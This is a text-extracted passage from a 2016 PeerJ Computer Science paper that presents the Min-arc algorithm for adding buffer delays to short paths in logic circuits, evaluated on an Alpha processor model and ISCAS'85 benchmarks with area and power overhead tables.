destination flip-flops, also exacerbates hold time requirements in sequential circuits. Hold time violations occur when the previous data is not held long enough. Hence, adding buffers to short paths that violate hold time criteria is a step that is carried out without too much of a concern regarding area and power overheads. Increasing the contamination delay of a logic circuit significantly without affecting its propagation delay is not straightforward (Shenoy, Brayton & Sangiovanni-Vincentelli, 1993). At first glance, it might appear that adding delay by inserting buffers to the shortest paths will solve the problem. However, delay of a circuit is strongly input dependent, and several inputs play a role in deciding the value of an output in a particular cycle. Current synthesis tools support increasing the delay of short paths through their hold violation fixing option; in a broader sense, what we essentially want to do is to extend the hold time of the backup register. Though it is possible to phase shift to a maximal extent, reducing the clock period by that amount may result in higher number of errors. Having a control over the increase in contamination delay gives us an advantage to tune the circuit’s frequency to the optimal value depending on the application and the frequency of occurrence of certain input combinations. Also, introducing delay to increase contamination delay increases the area of the circuit. Therefore, while judiciously increasing contamination delay we must also ensure that the increase in area is not exorbitant. PERFORMANCE & CONTAMINATION DELAY: A STUDY ON ALPHA PROCESSOR To demonstrate the effect of increasing short paths on performance, we conducted a simple study on Alpha processor model for different contamination delay settings. We ran selected set of SPEC 2000 benchmark workloads on SimpleScalar—a cycle accurate simulator (Burger & Austin, 1997). In order to embed timing aspects in SimpleScalar, we examined Avirneni et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.79 7/27 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.79 Table 1 Simulator parameters. Parameter Value Fetch/Decode/Issue/Commit width 4 inst/cycle Functional units 4 INT ALUs, 1 INT MUL/DIV, 4 FP ALUs, 1 FP MUL/DIV L1 D-cache 128K L1 I-cache 512K L2 Unified 1024K Technology node 45 nm Base frequency 2.5 GHz No. of freq levels 32 Freq sampling 10 µs Freq penalty 0 µs (Assuming Dual PLL) a hardware model of Alpha processor datapath and obtained the number of timing errors occurring at different clock period, for each workload. For this purpose we synthesized Illinois Verilog Model (IVM) for Alpha 21264 configuration using 45 nm OSU standard cell library (Stine et al., 2007). Although we are aware of the fact that the pipeline in IVM is simplistic, it does not have any impact on our results as we are performing a comparative study of different settings for the same circuit. In this experiment, we are exploring the impact of contamination delay on timing speculation framework at circuit level. Therefore, we believe our analysis and insights are applicable to other architectures as well. We adopt the configuration close to hardware model for SimpleScalar simulations as well. The details of the settings are presented in Table 1 and more details about our hardware model can be found in Ramesh, Subramanian & Somani (2010). It is important to note that, for our hardware model, the timing critical path is in the Issue stage of the processor pipeline. Therefore, applications which are core bound will be effected more than the applications that are memory bound. In this study, we have presented the benchmarks which has higher error rate than the rest of the suite for all 32 equal intervals of the operating frequency. Therefore, performance results from this study present the lower bounds of speed-up that can be observed for SPEC benchmarks. Performance results for other benchmarks are bound to be higher than speed-up observed in our study. Experimental results Figure 3A shows the cumulative error rate of selected SPEC 2000 workloads for 32 equal intervals, for worst-case delay of 7 ns and minimum contamination delay of 3.5 ns. The error profile obtained is the average values obtained by running the experiment for 100,000 cycles, and repeating the experiment with different sequences of 100,000 instructions for each workload. Benchmarks gap and bzip2 are core bound and therefore have a dominating timing error rate. Benchmark equake is memory bound and its timing error rate is less than the core bound applications for the entire operating frequency range. A random timing error injector induces appropriate number of errors in SimpleScalar. Pipeline stall of one cycle per error occurrence is added correspondingly. As increasing the contamination delay affects path distribution of the whole circuit, it is likely that the overall Avirneni et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.79 8/27 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.79 Figure 3 (A) Cumulative error rate at different clock periods for the IVM Alpha processor executing instructions from SPEC 2000 benchmarks (B) Average error rate per clock cycle (C) Normalized speed-up relative to reliably overclocked original unmodified circuit. error rate for each workload may go up. In our experiment, we assume uniform increase in error rate, denoted as Dev, for each workload. For our study, we used Dev =0,3,5 and 7%. Further, we analyze the performance impact of varying CDs with different target error rates (Tgt). Figure 3B shows the error occurrence per cycle for bzip2, equake and gap. Quite evidently, we observed smaller error occurrences for small/no deviation of circuit, and the error rate tend to increase as the error rate due deviation, Dev, goes up. However, a small increase in target error rate allows more margins for performance increase. But, this may not hold true for higher error rates. In general, it was generally observed that when Dev gets closer to Tgt, there was an increase in error occurrences. This is more noticeable in the case of gap. Since it may not always be possible to increase the contamination delay without affecting the critical paths, we increase the CD to a threshold limit. As a result, we may end up increasing the PD. We also experimented with the possibility of increasing PD by allowing a leeway of a small percentage. We study the speed-up obtained for different combinations of CD threshold and PD leeway relative to the performance of aggressive clocking framework with the original circuit. L〈l〉−T〈t〉 denotes l% leeway of PD and t% minimum threshold of CD. We performed our study for l =0,10,20 and 30% and t =10,20,30 and 40%. We found that in all the cases, performance goes up with threshold values, which is in agreement with our intuition. In other words, increasing the short path delays provides more allowance for reliable aggressive clocking assuming a moderate target error rate occurrence. It should also be noted that allowing a leeway on critical paths induces performance overhead. Normalized speed-up trend of bzip2 workload for various modes of operation is exemplified in Fig. 3C. We have illustrated the results for the modes that yielded performance gains. The performance of bzip2 benchmark for all the configurations we implemented is shown in Fig. 4. From the point of view of leeway on PD, our investigation on relative performance is summarized as follows: • L=0 is the best case scenario for performance benefits, yielding from 10–30% speed-up. • 0≤L≤10 is the effective range for any performance benefit, irrespective of T . • L=20% gives a small increase in performance in the range 0%≤Dev ≤7%. • L=30% gives a little increase in performance for few cases in the range 0%≤Dev ≤5%. • L > 30% causes performance overhead even for higher values of T and smaller Dev. Avirneni et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.79 9/27 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.79 �� Figure 4 Normalized speed-up of bzip2 benchmark for different L and T configurations. Similar trends were observed for equake and gap as well. Our experiments reveal that by increasing the delays of short paths up to 40%, subject to moderate increase in PD (typically 10%), yields up to 30% performance enhancement. Also, it is very important to keep the increase in error rate due to circuit deviation within 5%. This guarantees zero overhead even at maximum leeway (L=30%). This study establishes a case for change in the existing synthesis algorithms to incorporate minimum path delay constraints. The major change in this revised algorithm is to increase the short path delays without (or minimally) affecting the critical path delays of the circuit. A secondary and passive constraint is to maintain the circuit variation (if not make it better), so that the deviation causing increase in error occurrences is kept minimal. We will discuss more on this constraint later. We provide a systematic approach to realize circuits with path delay distribution that allows greater margin for aggressive clocking for performance enhancement. MIN-ARC ALGORITHM FOR INCREASING SHORT PATH DELAYS It is easy to understand that increasing short path delays invariably increases the area of the circuit and, if not done carefully, affects its propagation delay. An ideal solution is to have logic moved from the critical path to the non-critical paths without using the specified components at the output terminals. This is not always possible. The next best approach would be to increase the delay of short paths as much as possible without increasing the propagation delay, and keep the area increase within a limit. As mentioned earlier, short path delays can be increased without affecting propagation delay for carry look-ahead adders and other smaller circuits. However, this is done manually, and the area overhead is very high for 64-bit adders. Minimizing short path constraints, without increasing propagation delay may not be possible for many practical circuits. In that case, we can allow a small increase in the propagation delay, if that increase can allow higher margin for TS. Avirneni et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.79 10/27 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.79 We introduce Min-arc algorithm for increasing contamination delay of logic circuits up to a defined threshold. We adopt an approach closely resembling the min-cut algorithm for flow networks. The basic idea of the algorithm is to identify a set of edges, referred to as the cut-set, such that adding a fixed amount of delay to the set does not affect the delays of any long paths. However, an important difference between this and traditional flow networks is that the cut-set for the Min-arc may not necessarily break the flow of the network. But rather, the cut-set is a subset of edges in the actual (rather traditional) min-cut. The reason why we do not consider a traditional min-cut is to not unnecessarily add delay buffers where it is not needed. However, a subset of the min-cut edges is essential to keep the addition of delays minimal. Another reason for increasing the path delay in batches is to keep the structure of the logic network close to unaltered from the original network. Benefits of maintaining path delay distribution is explained further in ‘Evaluation of Min-arc Method.’ The basic outline of the Min-arc algorithm to increase the short path delay of the circuit is presented in Algorithm 1. The entire procedure is divided into six basic steps, in which the first and last steps are one-time operations, converting the logic circuit to an equivalent graph network and vice-versa. The remaining parts of the algorithm modify the graph into a weighted graph network and iteratively update the prepared network by adding the necessary delay to the selected interconnection using the modified min-cut procedure. We explain these steps in detail below. Construction of weighted graph network The first step is to convert the given combinational logic into a directed graph, where the logic blocks are nodes and the interconnections from each logic block to others form directed edges. The nodes and edges may be weighted depending on their time delays. To this graph we add a source, S, and edges that connects S to all the inputs. We also add a drain node, D, to which all the outputs connect. The weights for S, D and all the edges from/to them are set to zero. Figure 5 illustrates an example network model for a 4-bit ripple carry adder with S and D added. TPD and TCD of the logic circuit are highlighted in the figure. It is necessary to preserve the node types whether they are logic gates, buffer delays, input or output pins. Also it is important to note the type of logic for a logic gate node. This is important in order to maintain functional correctness of the circuit. Algorithm 1. Steps for Manipulating Short Path Delay in Logic Circuits STEP A: Convert combinational circuit to a graph STEP B: Get minimum and maximum path through every edge STEP C: Prepare graph for min-cut STEP D: Do min-cut on the graph obtained in step C STEP E: Add delay to the edges returned by min-cut STEP F: Update the graph and repeat Steps B through F until contamination delay is increased up to the required value STEP G: Convert the graph back to combinational logic circuit Avirneni et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.79 11/27 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.79 Figure 5 Illustration: network model for 4-bit ripple carry adder, assuming unit interconnect and logic delays. Finding the minimum and maximum path Once the directed network is constructed, the next step is to mark the edge weights for generating the cut-set. We use several terms and symbols as described in Table 2. We calculate the longest and shortest distances from source to one end node of an edge and from the other end of the edge to drain. That is, we obtain MAX(S,i), MAX(j,D) MIN(S,i) and MIN(j,D) for every edge e(i,j) in the weighted graph. We use Djikstra’s algorithm to calculate MAX() and MIN() functions. From this, we calculate emax(i,j) and emin(i,j) for every edge, e(i,j) as described in Table 2, which corresponds to the longest and shortest paths of the logic network through that edge. The paths marking emin(i,j) and emax(i,j) for randomly chosen nodes i and j for the 4-bit ripple carry example is depicted in Fig. 5. In a similar manner, the minimum and maximum weights for every edge are calculated. Preparing graph for min-cut We construct a weighted graph network to select a minimum weight interconnection to add the delay buffer. Once we add a delay buffer, we recalculate new edge weights. The edge weights are calculated in such a manner that the minimum weighted arc gives the most favorable interconnection where to add delay. The procedure for calculating new weights for every edge, e(i,j), is described in Algorithm 2. The edge, e(i,j) may fall under one of the four categories listed in the algorithm. For the first two cases, the edge weight is calculated as the sum of emin(i,j) and emax(i,j). This is the general scenario where the minimum and maximum paths are added as edge weights. The first case is the scenario of a short path, where emax(i,j) is smaller than the threshold for contamination delay. The latter case is when the selected edge, e(i,j), has a delay such that the shortest path is closer to the threshold than the longest path is to the propagation delay. In other words, when a delay buffer is added to any edge in the path to increase the short path delay by the given threshold, the maximum delay increase affecting a critical path is still within propagation delay of the circuit. The third scenario is when the longest path exceeds propagation delay including leeway. This edge is critical and by no means any buffer can be added to this. Hence, we assume a large number (INF) as the edge weight so that this edge is never picked as part of the min-cut. Finally, we have a case when delay buffer addition exceeds or gets Avirneni et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.79 12/27 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.79 Table 2 Definitions. Terms Definitions MAX(i,j) Maximum delay path from node i to j, incl. i and j MIN(i,j) Minimum delay path from node i to j, incl. i and j MAX(S,D) Propagation delay of the circuit, TPD MIN(S,D) Contamination delay of the circuit, TCD e(i,j) Edge from node i to j wt(i,j) Weight of edge from node i to j, not incl i and j emax(i,j) MAX(S,i)+wt(i,j)+MAX(j,D) emin(i,j) MIN(S,i)+wt(i,j)+MIN(j,D) LWY Percentage of leeway [0-1] on critical path while adding buffer. E.g., LWY =x% allows the target network to have TPD(1+x/100) as the final propagation delay THD Normalized threshold (from TCD to TPD) below which we do not want any short paths INF A very large integer value SCALE A moderate integer value, (>TPD), to scale the weight to a new range. func() A function dependent on TPD, TCD, emax(i,j) and emin(i,j). Returns a real number, 0-1. In this work, we define this as√ (emax (i,j)−THD) (TPD−THD) × √ (emin(i,j)−TCD) (THD−TCD) very close to the propagation delay. In this case, we scale the edge weight moderately higher than the original range. This addresses the case where addition of buffer to this edge affects longer paths. Finding the min-cut Once the edge weights are re-assigned, the cut-set is determined. We use a variant of Edmonds−Karp min-cut algorithm for graph network (Edmonds & Karp, 1972). The cut-set consists of edges with minimum weight in the graph with assigned weights. Figure 6 illustrates the different scenarios in determining the cut-set. The cut-set re-definition is necessary because the traditional min-cut always has at least one edge in the critical path. Figure 6A shows how a logic circuit is divided into critical and non-critical paths. As long as the non-critcical paths are independent of critical paths, buffer delays can be added to the former ones. In this case, the min-cut excludes all the critical paths. Generally, the scenario is not this straightforward. As illustrated in Fig. 6B, the short paths are intertwined with longer paths that are not critical paths. In such cases, the weights of the longer paths are scaled to a different range (in this case K). If there is a subset of short paths that exist independent of the longer paths, buffer delays are added to this subset. We noticed that this is the most common scenario in the benchmark circuits. Once all the independent short paths have been added with corresponding delays, the new circuit is left out with paths that are scaled as shown in Fig. 6C. Buffer delay is added to the scaled paths, which runs the risk of modifying longer paths into critical paths. The final circuit is shown in Fig. 6D, where there are only critical paths and paths that have delay meeting the threshold requirements. Avirneni et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.79 13/27 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.79 Figure 6 Illustration of four different scenarios finding the cut-set in Min-arc algorithm. In the ripple carry example, the case is similar to Fig. 6A. The cut-set is thus all the paths excluding the critical path. Figure 5 also shows the min-cut where the buffers are added. Algorithm 2. Re-calculation of Edge Weight for edge emax(i,j) 1: if emax(i,j) ≤ THD then 2: wt(i,j)=emin(i,j)+emax(i,j) 3: else 4: if (THD−emin(i,j) < (TPD−emax(i,j)) then 5: wt(i,j)=emin(i,j)+emax(i,j) 6: end if 7: else 8: if emax(i,j) > (TPD(1+LWY )) then 9: wt(i,j)= INF 10: end if 11: else 12: wt(i,j)=SCALE∗func() 13: end if Avirneni et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.79 14/27 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.79 Adding buffer delays The buffers are carefully placed on edges where they would not affect the longest paths. Thus, the amount of delay each buffer adds depend on the path connectivity, which may have major impact on the timing error occurrence. For example, it is possible to add delays such that all the paths have delay equal to the critical path delay. In most practical circuits, increasing all path delays to a certain delay interval can result in a rise in the timing errors, causing overhead due to error recovery. Thus, it is always necessary to keep this under control when designing the algorithm so that there is a gentle rise in path delays from one interval to the other. Buffers are added on the edges present in the cut-set. The amount of delay added, delay(i,j), for any edge e(i,j) is given by Eq. (7). delay(i,j)=min((THD−emin(i,j)),(TPD−emax(i,j))). (7) The delays for all the edges in a cut-set, for a given iteration, are added at the same time. While adding delay, we ensure that in one iteration there are no other edges to which the de- lay is added that are connected to paths through this edge. Please note that there is a relation between max-flow and min-cut problems and the proposed formulation is in fact max-flow. Satisfying conditions We iterate steps B through F until the minimum condition for the shortest path is met or until there is no other edge where delay can be added without affecting TPD of the circuit (including LWY ). Step F checks if the desired value of contamination delay is reached. Once the required conditions are met, no more buffers can be added and the algorithm moves on to step G. From our experiments, we found that the minimum condition for contamination delay is achieved for all the circuits we evaluated. Converting graph to logic circuit The final step is to revert back to the original circuit once the short paths lengths are increased to the desired level. Since we record the node types in the network graphs in step A, it is possible to re-build the circuit from the graph network with the added buffers. It should be noted that we do not modify the logic of the circuit, as we only add additional buffers preserving the original logic of the circuit. Complexity of Min-arc algorithm The time complexity of Min-arc algorithm is mainly affected by Steps B and D. Let |V | be the total number of logic blocks (vertices) and |E| is the total number of interconnections (edges) in the logic circuit. Using Djikstra’s shortest path algorithm, the worst case time to calculate MAX() and MIN() functions is O(|V |2). For finding the minimum weighted edge min-cut for the graph network, it takes O(|V‖E|2). In the worst case every edge becomes a part of the cut-set. That is, there are at most |E| iterations. Hence, the overall time complexity of the Min-arc algorithm is O(|V |2|E|+|V‖E|3), which is dominated by the second term as |V |< |E|. Impact of process variation Process variation can alter gate delays and hence can alter the distribution of path delays. Therefore, we need to take conservative estimates of circuit delays into account while Avirneni et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.79 15/27 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.79 Table 3 Brief description of ISCAS85 benchmarks with netlist details. Circuit Description Inputs Outputs Gates Nets Area (µm2) c432 27-channel interrupt controller 36 7 205 386 5,361 c499 32-bit SEC circuit 41 32 277 513 7,821 c880 8-bit ALU 60 26 471 841 11,792 c1355 32-bit SEC circuit 41 32 621 1,169 17,167 c1908 16-bit SEC/DED circuit 33 25 940 1,581 24,948 c2670 12-bit ALU and controller 233 140 1,644 2,665 36,016 c3540 8-bit ALU 50 22 1,743 3,033 49,140 c5315 9-bit ALU 178 123 2,610 4,810 71,726 c7552 32-bit adder/comparator 207 108 3,830 6,568 10,1953 using our algorithm. Inter-die variations impact all the paths and therefore impact on our algorithm is minimal. To mitigate intra-die variation, conservative padding of buffers needs to be done on the short paths to make sure that extreme variation is tolerated at the expense of area overhead. If such additional area overheads are to be ignored, process variation will only reduce the range of aggressive clocking slightly; and cannot eliminate the possibility of reliable overclocking and the scope for performance improvement by TS. Given that the scope of this paper is to demonstrate the concept and develop an algorithm to realize it, we do not evaluate the actual impact any further. EVALUATION OF MIN-ARC METHOD Although the time complexity of Min-arc algorithm is polynomial order, it is necessary to consider its performance on practical circuits. We evaluate the algorithm on ISCAS’85 benchmark suite (Hansen, Yalcin & Hayes, 1999). The suite provides a diverse class of circuits in terms of number of IOs, logic gates and interconnections (nets). Table 3 lists a brief description and other relevant details of the circuits. All the circuits were transformed into network graphs as described in ‘Min-arc Algorithm for Increasing Short Path Delays’. The interconnect delays and logic cell delays were obtained by synthesizing the circuits for 45 nm technology using OSU standard cell library (Stine et al., 2007). All circuits are synthesized for minimum area (max area is set to zero) using Synopsys Design Compiler, which acts as a starting point for our algorithm. All the configurations (L〈l〉−T〈t〉) described in ‘Performance & Contamination Delay: A Study on Alpha Processor’ were investigated. Results analysis Positive results were noted in this study. First, for all the circuits, the Min-arc method was able to increase the short path delays to the desired threshold levels without any leeway on PD. We continued our evaluation with all the configurations to include leeway in order to study the effect of increasing PD. We include the results only for a few selected circuits and average of all circuits. It was found that circuit characteristics (i.e., size and connectivity) have strong effects on how the algorithm performs. Figure 7 illustrates the increase in the short path delays and critical path delays for different configuration in c432 and c5315 Avirneni et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.79 16/27 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.79 Figure 7 Charts showing increase in contamination (short path) delay and propagation (critical path) delay of circuits. circuits. The chart also shows the average increase of short and critical path delays for all nine circuits. For smaller circuits (as in c432), we notice that there is not much the algorithm possibly could do, as there is a higher chance of affecting the critical path by adding delay to any net. In c432, we notice that the maximum delay increase of short paths from the base circuit with 91 ps, (with 0% leeway) is around 225 ps. However, in larger circuits (as in c5315), delay buffers were more easily added. This is seen in c5315, where short path delay is increased from 20 ps to 430 ps, again with 0% leeway. In other words, as the circuit size increases, the number of independent short paths also become higher in number, allowing easy inclusion of delay buffers. It should also be noted that there is not much impact on increasing leeway from L0 to L5 or even higher levels PD. On the other hand, increasing leeway tend to have a great impact in increasing the CD. On an average, there is a 1.5× factor of increase in short path delay for each 5% increase in leeway. Assuming LWY =0, we were able to achieve 300%–900% increase in CD, and increasing LWY steadily from 5 to 30%, we observed increase of CD in a saw tooth pattern achieving 315%–1,165% increase in CD. It should be observed from the critical path delay patterns that the algorithm strictly adheres to the limit imposed on critical path delay. One major side effect of adding buffers to circuits is that it affects path delay distribution. Although our goal is to increase the CD to a threshold limit, pushing a set of paths to one side may increase the timing error rate during execution. Therefore, it is important to analyze the delay distribution of the circuit paths. Even though the structure of the circuit is maintained, as the short paths are now pushed to offer higher delay, it increases the possibility of error occurrences in TS framework. For our case study in ‘Performance & Contamination Delay: A Study on Alpha Processor,’ we modelled this increase in timing error rates as Dev. Avirneni et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.79 17/27 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.79 Figure 8 Path delay distribution from CD to PD for c432 and c7552. Figure 8 illustrates the path delay distributions for selected configurations of two circuits (c432 and c7552). We have divided the range between CD and PD into ten bins. X-axis in Fig. 8 represent the bin number. For c432, T30L0 and T30L5 configuration reduce the number of paths having higher delay. This implies a reduction in timing error rate in TS framework. Higher leeway configuration T30L30 increases CD but path delay distribution matches the base line, implying no increase in timing error rate. For c7552, even no leeway configuraion (T30L0) performs better than baseline. Also, higher leeway configurations, T30L5 and T30L30, perform much better than baseline in terms of paths having higher delay. Overall, for c432 (and other smaller circuits), the path structure is mostly maintained and in the case of c7552 (and otherlarger circuits), the circuit structure was altered moderately. Increase in number of paths having higher delay implies increase in timing error rate of TS framework. From these results, we conclude that for smaller circuits, our algorithm maintains or does not increase timing error rate of TS framework. For larger circuits, our algorithm reduces the timing error rate for higher leeway configurations. As timing error rate also influence the possible performance gain, reduction in timing error rate is favorable for TS framework. To illustrate this point further, we present mean and standard deviation of all the circuits. Figure 9 presents plots of selected circuits and average of all the circuits. We note that the smaller circuits (c432) suffer from negligible deviation from original circuit in spite of higher mean, and the larger circuits ((c7552)) are vulnerable to change in structure. From the average plot, it is also evident that higher leeway values cause more deviation. A maximum deviation of −12% and +16% were observed for T30L0 and T30L30 configurations, respectively. Area overhead A major overhead for Min-arc algorithm is the area penalty. More the circuit allows adding buffers, more the overhead in chip real estate. We estimate the original circuit area in terms of buffer delays, and compare the area increase for each of the configurations. This study facilitates to narrow down the choices of L and T for any given circuit. Table 4 enlists the percentage area increase for various L and T combinations, for all the circuits. It is important to choose the configuration that has highest increase in delay with moderate increase in area. Avirneni et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.79 18/27 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.79 Figure 9 Average path delay distribution, in terms of mean and deviation. Mean values are represented by line while standard deviation values are represented by bars. Without any leeway (corresponding to L0), with every 5% increase in T there is around 20% increase in area. This holds for most circuits, except for smaller circuits as in c499 and c880, where it is around 10%. A maximum of 100% increase is observed for c2670 at T =30%. For this maximum threshold, there is a wide range of area increase across the benchmark circuits. We did not observe any strong relation between circuit size and the area increase. This means that it is the circuit connectivity that has a major role to play on buffer placements. For T =30%, the minimum area increase of around 10% is observed for the circuit c3540. A general observation from our study is that the area increases with L or T . However, we did observe quite a few configurations, where the area decreases with L or T . This reflects how the algorithm handles different input combinations independently, rather than building from previous level output. We noticed several places where area would decrease with L (shaded dark black in Table 4). Observation related to these shaded entries is that they beat the increasing area trend with increasing leeway. As illustrated, there is at least one place where this occurs in each circuit, with the exception of c499 and 2670. In the case of T , we notice that there are only a couple of configurations where this occurs, namely in c3540 (underlined in Table 4). This explains how target threshold for short paths affect increase in area. In most cases, we noticed around 2% increase in area for every 5% in L. In majority of the cases, we noted only moderate increase in area (<50%). We observed 12 cases where the area increase was more than 100%, in which 10 of them are from the same circuit, c2670. This is a 12-bit ALU with controller (c2670) that has a lot of parallel paths with few common edges. Similar but less intense effect is seen in the case of the 9-bit ALU (c5315). The configurations where the area increase exceeds 100% is highlighted light black in the table. Power overhead The addition of buffers to the circuit for increasing contamination delay also increases the power consumption. Table 5 presents the percentage power increase for various L and T combinations. Using the spice models, we have estimated the power consumed by the buffers added and estimated the percentage increase in worst case power consumption. We have used golden configuration (L0T0) as the base for all configurations of L and T . Avirneni et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.79 19/27 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.79 Table 4 Percentage area increase after addition of buffers relative to base configuration T0L0. Ckt L0 L5 L10 L15 L20 L25 L30 c432 T10 0.0 0.0 0.0 0.0 0.0 0.1 0.3 T15 2.2 1.9 2.3 2.7 3.1 3.6 4.0 T20 10.9 14.4 5.7 6.4 7.2 8.0 8.9 T25 27.9 34.7 10.9 12.1 12.2 13.4 14.6 T30 55.9 62.2 70.7 19.9 20.0 19.5 21.0 c499 T10 1.3 2.3 3.3 4.2 5.3 6.2 7.2 T15 11.1 12.6 14.1 15.6 17.0 18.6 20.0 T20 21.0 22.9 24.9 26.9 28.9 30.8 32.8 T25 30.8 33.3 35.7 38.2 40.7 43.1 45.6 T30 40.6 43.6 46.5 49.5 52.4 55.4 58.3 c880 T10 0.9 1.1 1.3 1.7 2.0 2.4 2.8 T15 4.6 5.4 6.2 6.9 7.8 8.8 9.9 T20 13.3 15.1 13.6 15.3 17.1 18.8 20.6 T25 25.0 35.4 23.2 25.4 27.6 29.7 31.9 T30 32.7 37.8 49.3 35.4 38.0 40.6 43.3 c1355 T10 0.0 0.1 0.9 1.6 2.4 3.2 3.9 T15 7.9 9.6 9.2 10.3 11.5 12.6 13.7 T20 23.0 26.0 29.0 19.0 20.5 22.0 23.5 T25 38.0 41.8 45.6 27.7 29.6 31.4 33.3 T30 53.2 57.7 62.2 36.3 39.3 40.9 43.1 c1908 T10 3.1 3.7 4.3 4.9 5.5 6.1 6.7 T15 8.1 9.9 10.8 11.7 12.6 13.5 14.4 T20 15.4 16.1 18.3 18.5 19.7 20.9 22.1 T25 24.7 25.1 27.1 28.9 26.9 28.3 29.8 T30 35.2 35.9 35.9 37.9 40.2 44.1 37.5 c2670 T10 23.4 25.1 26.8 28.6 30.4 32.1 34.0 T15 41.6 44.5 47.4 50.4 53.3 56.3 59.2 T20 60.5 64.6 69.0 73.0 77.0 81.0 85.0 T25 81.1 88.3 92.1 95.9 100.9 105.9 110.8 T30 100.5 117.6 113.2 132.3 131.6 138.1 136.9 c3540 T10 0.6 0.7 0.8 0.9 1.0 1.0 1.1 T15 2.0 2.8 2.7 3.1 3.5 3.9 4.3 T20 5.4 5.2 7.7 6.4 7.0 7.6 8.2 T25 7.7 17.6 9.9 13.9 15.1 11.4 12.2 T30 10.8 15.6 19.5 13.4 45.0 21.4 27.4 c5315 T10 7.9 11.7 12.8 14.0 15.1 16.3 17.5 T15 24.6 25.7 25.8 27.6 29.4 31.2 33.0 T20 39.8 42.6 41.6 41.6 44.1 46.5 49.0 T25 63.5 66.1 58.3 56.1 58.8 61.9 65.0 T30 74.3 102.9 085.1 107.3 95.2 77.3 81.0 (continued on next page) Avirneni et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.79 20/27 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.79 Table 4 (continued) Ckt L0 L5 L10 L15 L20 L25 L30 c7552 T10 5.4 5.5 5.9 6.2 6.7 7.1 7.5 T15 9.4 10.2 11.1 11.9 12.8 13.7 14.6 T20 15.3 16.5 17.8 19.0 20.2 21.5 22.9 T25 22.6 26.0 26.9 26.4 29.2 29.6 31.2 T30 40.3 39.2 43.6 41.7 35.7 37.7 39.6 We notice from the table that increase in power consumption is also dependent on the circuit topology rather than the size of the circuit. Without any leeway (corresponding to L0), with every 5% increase in T there is only around 4% increase in power. This holds for most circuits, except for smaller circuit c432. We also notice that for a given T , increasing L has very minimal effect (2%–3%) on the power increase. Therefore, while applying our algorithm, an optimal value of T can be chosen as any value of L can be chosen without altering the power budget. When timing speculation is used for overclocking, voltage is kept constant. Therefore, increase in power is independent of voltage and is dependent only on frequency change and the additional power overhead caused by the buffers. In this paper, as we primarily analyze our algorithm at circuit-level, we only present power results at circuit-level. Changes in system-level power estimates can be easily derived with the power analysis present in this section. When compared to area overheads of our algorithm, power results presented in Table 5 are quite interesting. For example, for circuit c2670 where we have seen 100% area increase, power increase is only about 16%. The power increase is relatively small when compared to the area increase. It is due to the fact the delay buffers draw much less current than the other standard cells. Even though we are limited with the type of delay buffer configurations available in our cell library, much more complex buffers can be constructed at gate-level which can consume less power without degrading delay characteristics. RELATED LITERATURE Early works on timing verification involved identification and categorization of long paths as either false paths or sensitizing paths (Du, Yen & Ghanta, 1989). Long paths that are false paths (paths with no activity) unnecessarily increase the circuit critical delay. Therefore, detecting false paths and mitigating them is a critical issue in digital circuits even to this day (Cheng et al., 2007; Tsai & Huang, 2009; Coudert, 2010). As already mentioned in ‘Introduction,’ not many works are done keeping short paths in mind. Sylon-Dream accomplishes faster multi-level networks by its level reduction technique (SDLR) (Chen & Muroga, 1991). The non-critical paths are processed by an area reduction procedure to reduce network area without increasing the maximum depth. SDLR uses the concept of permissible functions in both level and area reduction procedures. Gate resizing and buffer insertion are two major techniques for critical path optimization. Critical path selection instead of sensitization is suggested for performance optimization (Chen, Du & Liu, 1993). Here the objective is to select a small set of paths to ease the optimization process by guaranteeing the delay of the circuit to be no longer than a given threshold. Avirneni et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.79 21/27 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.79 Table 5 Percentage power increase after addition of buffers relative to base configuration T0L0. Ckt L0 L5 L10 L15 L20 L25 L30 c432 T10 0.0 0.0 0.0 0.0 0.0 0.2 0.5 T15 2.2 1.9 2.2 2.7 3.1 3.4 3.9 T20 10.4 13.5 5.5 6.0 6.7 7.7 8.4 T25 26.3 32.5 10.4 11.6 11.6 12.5 13.7 T30 52.3 58.3 66.3 18.8 18.8 18.3 19.8 c499 T10 0.4 0.8 1.1 1.5 1.8 2.1 2.5 T15 3.8 4.3 4.7 5.3 5.7 6.2 6.7 T20 7.1 7.7 8.3 9.0 9.6 10.3 11.0 T25 10.3 11.1 12.0 12.8 13.5 14.4 15.2 T30 13.5 14.6 15.6 16.6 17.5 18.5 19.5 c880 T10 0.3 0.4 0.5 0.7 0.8 0.9 1.0 T15 1.6 2.0 2.2 2.5 2.8 3.2 3.5 T20 4.7 5.3 4.8 5.5 6.0 6.7 7.3 T25 8.8 12.4 8.2 8.9 9.7 10.5 11.2 T30 11.6 13.3 17.3 12.4 13.4 14.3 15.3 c1355 T10 0.0 0.1 0.3 0.5 0.9 1.1 1.3 T15 2.6 3.2 3.1 3.4 3.8 4.2 4.5 T20 7.6 8.5 9.5 6.2 6.7 7.2 7.7 T25 12.5 13.7 14.9 9.1 9.6 10.3 